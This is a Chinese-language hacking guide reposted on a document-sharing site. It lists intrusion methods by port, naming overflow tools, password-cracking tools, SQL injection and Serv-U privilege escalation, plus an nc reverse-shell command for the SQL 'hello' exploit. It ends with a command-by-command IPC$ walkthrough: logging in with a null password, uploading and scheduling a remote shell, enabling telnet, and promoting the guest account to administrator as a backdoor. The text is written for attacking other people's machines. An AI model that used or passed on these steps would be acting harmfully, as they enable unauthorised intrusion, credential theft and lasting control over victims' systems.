搜档网
当前位置:搜档网 › 各个端口的入侵

各个端口的入侵

1. 1433端口入侵 (SQL开放的服务端口)
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵 (REMOTE ADMINISTRATOR 远程管理软件开放的端口)
用4899过滤器.exe,扫描空口令的机器

3. 3389的入侵 (系统远程管理桌面默认开放的端口)
对非常早的机器,能试试3389的溢出(win3389ex.exe)
对2000的机器,能试试字典暴破。(tscrack.exe)

4. 80入侵
对sp3以前的机器,能用webdav入侵;
对bbs论坛,能试试上传漏洞(upfile.exe或dvup_delphi.exe)
能利用SQL进行注入。(啊D的注入软件)。

5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,能用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过和字典档(dict.txt)的比较,得到密码

6. 554端口
用real554.exe入侵。

7. 6129端口
用DameWare6129.exe入侵。

8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。

9. 3127等端口
能利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
1. C:/>net use $">//127.0.0.1/IPC$ "" /user:"admintitrators"
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就能用这样的命令来和127.0.0.1建立一个连

接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名

,输入administrators,命令即可成功完成。

2. C:/>copy srv.exe $">//127.0.0.1/admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的

c:/winnt/system32/,大家还能使用c$、d$,意思是C盘和D盘,这看你要复制到什么地方去了)。



3. C:/>net time //127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:/>at //127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.

5. C:/>net time //127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备

开始下面的命令。


6. C:/>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,不过我们使
用的

是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们能Telnet上去了,不过SRV是一次性的,下次登录还要再激活!所以我们打

算建立一个Telnet服务!这就要用到ntlm了

7.C:/>copy ntlm.exe $">//127.0.0.1/admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:/WINNT/system32>ntlm
输入ntlm启动(这里的C:/WINNT/system32>指的是对方计算机,运行ntlm其实是让这

个程式在对方计算机上运行)。当出现"DONE"的时候,就说明已启动正常。然后使

用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名和密码就进入对方了,操作就像在DOS上操作

相同简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:/>net user guest /active:yes
将对方的Guest用户激活

11. C:/>net user guest 1234
将Guest的密码改为1234,或你要设定的密码

12. C:/>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改动的话,下次我们能用guest再次访问这台计算机)


相关主题